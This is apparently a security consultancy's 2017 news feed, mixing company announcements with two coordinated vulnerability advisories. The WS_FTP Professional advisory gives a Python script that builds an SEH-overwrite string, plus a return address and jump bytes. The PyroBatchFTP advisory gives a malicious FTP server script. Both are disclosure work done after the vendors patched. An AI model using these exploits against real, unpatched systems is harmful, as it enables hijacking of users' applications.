Scottish Cyber Awards 2017

The Scottish Cyber Awards are back!

The Scottish Cyber Awards are returning this November and it looks set to be another great night. Last year, the event was a fantastic celebration of the Cyber Security community in Scotland and we hope this year will be even more successful!

 

As an Information Security Consultancy operating in Scotland, the Scottish Cyber Awards are close to our hearts, as we strongly believe that there is a talented InfoSec community here. We were delighted to be part of this event, both with sponsoring an award and our CEO, David Stubley, acted as a judge for the entries. David said that;

It was difficult to pick winners in some categories because the level of competition was so high, but it is fantastic to help give the winners the recognition that they deserve.

 

Last year, we were thrilled to be awarded the ‘Cyber SME Defender of the Year’ award and this year are looking forward to passing the baton on to our successor. As an SME ourselves, we know the important role that Cyber SME’s provide, which is why we were delighted to sponsor this award and are looking forward to congratulating this year’s worthy winner.

The Scottish Cyber Awards are being held at the Sheraton Hotel, Edinburgh on the 22nd November 2017.

CVE-2017-16513 – Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)

Advisory Information

Title: CVE-2017-16513 Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)

Date Published: 03/11/2017

Advisory Summary

The application accepts user input to perform a local search function. Inputting an excessively long string of characters causes the program to crash and for an attacker to gain control of the execution flow of the application. This issue also impacts the “backup location” field.

Vendor

Ipswitch

Affected Software

Product Version
Ipswitch WS_FTP Professional 12.6.03

Description of Issue

A local buffer overflow vulnerability was discovered in Ipswitch WS_FTP Professional version 12.6. This vulnerability was found in the “local search” component of the application. Entering a search string longer than 779 characters will cause the program to crash. It is possible to overwrite the structured exception handler (SEH) after an offset of 840 characters and hijack execution flow of the application. This issue also impacts the “backup location” field and was tested on a 32-bit Windows 7 host.

PoC

The following proof of concept python script will generate a text file with a string to overwrite SEH. Once the file is generated, copy the contents of poc.txt and paste into the local search field to trigger the crash.



#!/usr/bin/python
#Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)
#Author: Kevin McGuigan
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.ipswitch.com
#nSEH = "\x74\x08\x90\x90"
#SEH = "\x31\x2D\x91\x23"

buffer = "A" * 840
nSEH = "B" * 4
SEH = "C" * 4


f = open ("poc.txt", "w")
f.write(buffer + nSEH + SEH + "D" * 200)
f.close()

This will result trigger an SEH overwrite, as demonstrated by the following screenshot:

SEH Overwrite
 

From here, we can replace SEH with POP POP RET instructions, located at:

23912D31

And replace nSEH with the following code to jump to our payload:

"\x74\x08\x90\x90"

Which will land at the payload, represented in the proof of concept as the character ‘D’ (\x44).

SEH Overwrite
 

A short video proof-of-concept can be seen below:

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of Ipswitch WS_FTP Professional can be found on the Ipswitch website.

Timeline

Initial request for security contact via vendor website – 20th September 2017

Second request sent to vendor – 4th October 2017

Reponse from security contact, advisory sent – 5th October 2017

Video poc requested by vendor – 10th October 2017

Video poc sent – 10th October 2017

Fix verified by both parties – 20th October 2017

Patch Released – 2nd November 2017

Advisory Released – 3rd November 2017

Fraud and Breach Prevention Summit

Fraud & Breach Prevention Summit: London (17th and 18th October)

7 Elements are proud to be a sponsor of this year’s Fraud & Breach Prevention Summit in London.

We believe this summit is important in bringing the topic of security breaches into the public conscious. As an information security consultancy delivering incident response capability for our clients, we are well placed to see the rising numbers of breaches.

Breaches happen to all types organisation regardless of size or industry and it is important to know how to deal with them effectively.

Our CEO, David Stubley, will be taking part in the following two panels and presenting on the topic of incident response:

  • ‘We’ve Been Breached: Now What? How to Effectively Work with Law Enforcement’
    15:20 on the 17th of October. The panel will discuss the importance of planning when it comes to incident response and working proactively with law enforcement.
  • ‘Equifax Breach: Long-term Implications. What Does It Mean for Europe?’
    16:05 on the 17th of October. The panel will discuss the long-term implication of the Equifax breach and the lessons that all organisations should learn from it.
  • In ‘Disaster Strikes: Here’s Your Incident Response Playbook’, David will discuss the five core principles all organisations should apply when responding to an incident. The talk will take place at 12:55 on the 18th of October.

Office Move and Expansion

The past few weeks have been a busy period for the team at 7 Elements. Behind the scenes we have recently moved our Scotland office to the Oracle Campus in Linlithgow, and extended our UK wide coverage by establishing a 7E presence within London.

Scotland

Our Scotland based team will still be the primary point of contact for all engagements, and the new office details can be found here.

 

 

 

 

 

London

Our expansion into London is in partnership with Scottish Enterprise and the Scottish Government, with 7 Elements using the prestigious Scotland House as our London base. We are working on some exciting events that we will be hosting at Scotland House, so watch this space for future news and invitations.

Further reading from ScotSoft 2017

Following David’s presentation “Breaking Bad – Season Two” at ScotSoft 2017, this post contains the remediation advice and further reading notes on the matters presented.

[Read more…]

CVE-2017-15035 PyroBatchFTP Buffer Overflow (SEH Overwrite)

Advisory Information

Title: PyroBatchFTP Buffer Overflow (SEH Overwrite)

Date Published: 04/10/2017

Advisory Summary

It is possible to cause a buffer overflow in PyroBatchFTP when a client connects to an FTP server with an excessively long current directory string.

Vendor

Emtec

Affected Software

Product Version
PyroBatchFTP 3.17

Description of Issue

A buffer overflow vulnerability was discovered in the PyroBatchFTP client version 3.17. This vulnerability occurs after successfully connecting to an FTP server with a current directory string of longer than 2265 characters. It is also possible to overwrite the Structured Exception Handler (SEH) and potentially hijack execution flow of the application.

PoC

The following proof of concept python script will initialise an FTP server on the host system.
Connecting to the FTP server using PyrobatchFTP will trigger the buffer overflow.


#!/usr/bin/python

print "Pyro FTP Buffer Overflow (SEH) Server"

#Author: Kevin McGuigan
#Author Website: https://www.7elements.co.uk 
#Vendor Website: https://www.emtech.com

import socket 
import sys

buffer="A"*2292+ "B"*4+"C"*4+"D"*800 
port = 21

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
        s.bind(("0.0.0.0", port))
	s.listen(5)
	print("[+] FTP server started on port: "+str(port)+"\r\n")
except: 
	print("[+] Failed to bind the server to port:"+str(port)+"\r\n")
while True:
	conn, addr = s.accept()
	conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n') print(conn.recv(1024))
	conn.send("331 OK\r\n")
	print(conn.recv(1024))
	conn.send('230 OK\r\n')
	print(conn.recv(1024))
	conn.send('220 "'+buffer+'" is current directory\r\n')

SEH Overwrite
 

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of PyroBatchFTP can be found on the EmTec website.

Timeline

Reported – 16th September 2017

Vendor Response – 18th September 2017

Update Requested – 3rd October 2017

Vendor Response and Patch – 4th October 2017

Advisory Published – 4th October 2017

Summer Newsletter 2017

Did you miss our latest newsletter? If so, you can get a copy here and don’t forget to sign up for future copies.

Phishing and Awareness

2017 has seen an increase in the uptake of our tailored phishing services, as organisations look to gain a deeper understanding of the threat posed.

Currently the average exposure (the percentage of employees clicking phishing emails) is 42% with outliers at 83% and in many of our engagements we are able to entice end users to provide domain credentials.

 

This clearly shows a need for training and awareness along with regular testing to measure the effectiveness of any intervening attempts to improve on how staff deal with phishing attempts.

As part of this holistic approach, 7 Elements are proud to announce that we are partnering with Advanced Engagement to deliver customised security awareness training, alongside real world phishing engagements to measure the effectiveness of such campaigns.

Advanced Engagement is a dedicated security awareness training company trusted by financial services organisations and professional bodies with the aim of positively influencing the security culture in your organisation.

If you would like to explore your organisations exposure to phishing, then please get in touch with our team to discuss how we can help.

7 Elements shortlisted for award

Government Places Importance on Cyber Essentials

Matt Hancock, the minister for Digital and Culture, made it clear today that the Government wishes Cyber Essentials Accreditation to become a priority for all businesses. This comes after 2016 was plagued consistently with high-profile attacks: ranging from Yahoo to the American Election. In a recent IoD Survey, it was found that whilst 95% of business leaders considered cyber security to be very/quite important to their business; 45% did not have a formal cyber security strategy in place.

Cyber Essentials is already a requirement for many Government suppliers and sub-contractors, such as in the Healthcare and defence industries. However, Matt Hancock stated that the Government will be widening this Cyber Essentials criterion to include more suppliers than ever. Furthermore, a number of the UK’s biggest firms, such as Barclays, BT, Vodafone and Airbus Defence & Security, have agreed to promote Cyber Essentials accreditation to their suppliers.

7 Elements is the leading Scotland- based Cyber Essentials Certification Body. As an independent technical information assurance consultancy, we pride ourselves on being well placed to help your organisation through the process of gaining Cyber Essentials certification.

More information on Cyber Essentials can be found here, or just get in touch with the team.